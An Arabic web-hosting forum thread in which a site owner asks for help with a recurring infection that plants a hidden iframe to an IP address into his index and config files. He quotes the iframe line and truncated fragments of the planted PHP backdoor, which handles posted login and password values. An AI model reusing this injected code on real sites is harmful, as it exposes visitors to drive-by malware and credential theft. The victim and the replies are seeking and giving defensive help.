 |
السلام عليكم
تعرض احد الاخوة لمشكلة بموقعه وهي اختراق ، ولكن كل ما فعله المخترق هو تغيير اي صفحة اندكس index php او html حيث يقوم بزرع امر ifreame لموقع خارجي عبارة عن ip داخل كل ملف او عدة اوامر !
لماذا يحصل هذا الموضوع وما هي طرق الحماية منه مع الشكركود:<iframe src='http://81.95.145.240/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
__________________
إستخدم ملفك الخاص لكتابة توقيعك
الرجاء المساعدة
كل ما حذف الكود المذكور رجع مرة اخرى !
ما المشكلة وما الحل مع هذه المصيبة؟
__________________
إستخدم ملفك الخاص لكتابة توقيعك
ظهرت هذه المشكله بهاك الاهداءات
ما ادري هل المشكله بمنتدى او صفحات عاديه
اذا بمنتدى اضف iframe للكلمات الممنوعه وابحث عن ثغره الاهداءات بترايدنت حصلت معي بالسابق ووجدت الحل هناك
اهلا اخي الكريم
للاسف لا يوجد لدي هاك الاهداءات
المصيبة الكبرى حصلت الآن وانا ادخل سيرفر زميلي وادخل موقعه
ثم بعد ذلك دخلت سيرفر موقعي ووجدت ان ملفات الموقع تلغمت بهذا الكود
يعني انتقلت العدوى
قرأت منذ قليل موضوع بعد البحث لاحد الاخوة
http://www.swalif.net/softs/swalif54/softs182966/
وذكر فيه انه هذا فيروس!
وللاسف لا موقعي ولا موقع زميلي لدينا الشل حتى ننفذ أمر البحث عن الفيروس وحذفه
ما الحل يا اخوان ، المشكلة كبرت !؟
__________________
إستخدم ملفك الخاص لكتابة توقيعك
هذا الكود يتعبث ويحشر انفه في ملفات index بكافة انواعها
html
php
htm
shtml
وحتى دخل ملفات مثل config.php و auth.php وlogin.php
ويزرع الكود بعد body او بعد تقفيلة html او في ملفات php اسفل الملف !!
!!
وش هالمصايب اللي قاعدة تهل !
__________________
إستخدم ملفك الخاص لكتابة توقيعك
اعتقد انه اخراق سيرفر كامل
لانه في ثغرة بتغير كل صفحة اسمها index وباى امتداد وبتكون على السيرفر كله
راسل الشركة المستضيفة وهيفيدوك اكتر من سؤالك هنا
__________________
Ahmed Hassan
Web.Serve
مرحبا
اخي الكريم كانت المشكلة عند زميلي ، ما علاقة ملفات موقعي تتضرر ؟؟؟!!
الآن ملفات موقعين من مواقعي اصبحت ملغمة بهذا الكود والغريب ان كل موقع في سيرفر مستقل!!
هو فيروس اكيد لكن كيف وصل لموقعي ؟
هل عن طريق فتح صفحات موقع زميلي وبالتالي اصيب جهازي بهذا الفيروس ومن ثم انتقل لمواقعي عندما افتحها بالافتي بي ؟
كيف انظف الموقع بدون تفعيل الشل ؟
هل توجد طريقة؟
افيدوني ولكم الأجر
__________________
إستخدم ملفك الخاص لكتابة توقيعك
ما فيه حل يا اخوان ؟؟
اليوم الصباح وبعد أن حذفت أغلب برامج الموقع ولم يبقى الا برنامجين فقط وقمت بتنظيف ملفاتهما تماما لافاجأ قبل قليل ان كود الآي فريم مزروع في ملفاتهما !!
على قولة اخواننا المصريين: برج من دماغي حيطير!
حتى اني انشأت مجلدين جديدين للتجربة ووضعت في كل منهما ملفي index نوع html وآخر php وكلاهما فارغان ولم يسلما من زرع هذا الكود اللعين !!
ارجو المساعدة يا اخوان ، المسألة مهمة
__________________
إستخدم ملفك الخاص لكتابة توقيعك
ايضا وجدت ملفات php لا علاقة لها بالموقع مزروعة في اكثر من مجلد
يوجد بها كود غريب يتعلق على هذا الشكل
error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] :
وهذا
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_on
وللمعلومية فقد قمت بحذف كل هذه الملفات قبل أن يعود ويزرع الكود مرة اخرى !
والله وجع راس !
الرجاء التعاون
__________________
إستخدم ملفك الخاص لكتابة توقيعك
ضوابط المشاركة
رد مع اقتباس